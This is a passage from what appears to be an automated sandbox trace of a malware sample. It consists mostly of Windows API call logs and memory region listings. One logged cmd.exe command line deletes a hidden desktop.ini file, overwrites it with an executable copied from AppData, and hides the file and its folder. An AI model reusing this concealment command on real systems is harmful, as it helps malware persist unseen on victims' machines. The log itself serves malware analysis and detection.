hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.411] GetFileType (hFile=0x4c) returned 0x1 [0134.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.412] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.412] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.412] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.413] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.413] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.413] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.414] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.415] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.415] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.415] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.416] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.416] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] GetFileType (hFile=0x4c) returned 0x1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.416] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.417] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.417] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x32, lpOverlapped=0x0) returned 1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.417] GetFileType (hFile=0x4c) returned 0x1 [0134.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.418] GetFileType (hFile=0x4c) returned 0x1 [0134.418] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.418] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x32, lpOverlapped=0x0) returned 1 [0134.418] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.418] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.418] _close (_FileHandle=4) returned 0 [0134.418] FindNextFileW (in: hFindFile=0x1d0e88, lpFindFileData=0x16f0f4 | out: lpFindFileData=0x16f0f4) returned 0 [0134.428] GetLastError () returned 0x12 [0134.428] FindClose (in: hFindFile=0x1d0e88 | out: hFindFile=0x1d0e88) returned 1 [0134.428] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0134.428] _close (_FileHandle=3) returned 0 [0134.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.428] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.429] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.429] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.429] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.429] SetConsoleInputExeNameW () returned 0x1 [0134.429] GetConsoleOutputCP () returned 0x1b5 [0134.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.429] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.429] exit (_Code=0) Process: id = "129" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13264 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13265 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13266 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13267 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13268 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13269 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13270 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13271 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13272 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 13273 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13322 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13323 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13324 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13325 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 13326 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 13327 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13328 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13329 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13330 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13331 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13332 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13333 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13334 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13335 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13336 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 13337 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13338 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13339 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13340 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13341 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 13342 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13343 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 13344 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 13345 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 13346 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 186 os_tid = 0xafc [0134.360] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfa44 | out: lpSystemTimeAsFileTime=0x1cfa44*(dwLowDateTime=0x8a055920, dwHighDateTime=0x1d440a9)) [0134.360] GetCurrentProcessId () returned 0xc10 [0134.360] GetCurrentThreadId () returned 0xafc [0134.360] GetTickCount () returned 0x2a9c5 [0134.360] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfa3c | out: lpPerformanceCount=0x1cfa3c*=19114945404) returned 1 [0134.361] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0134.361] __set_app_type (_Type=0x1) [0134.361] __p__fmode () returned 0x76b331f4 [0134.361] __p__commode () returned 0x76b331fc [0134.361] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0134.361] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0134.361] GetCurrentThreadId () returned 0xafc [0134.361] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xafc) returned 0x38 [0134.362] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.362] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0134.362] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.362] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.362] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf9d4 | out: phkResult=0x1cf9d4*=0x0) returned 0x2 [0134.362] VirtualQuery (in: lpAddress=0x1cfa0b, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 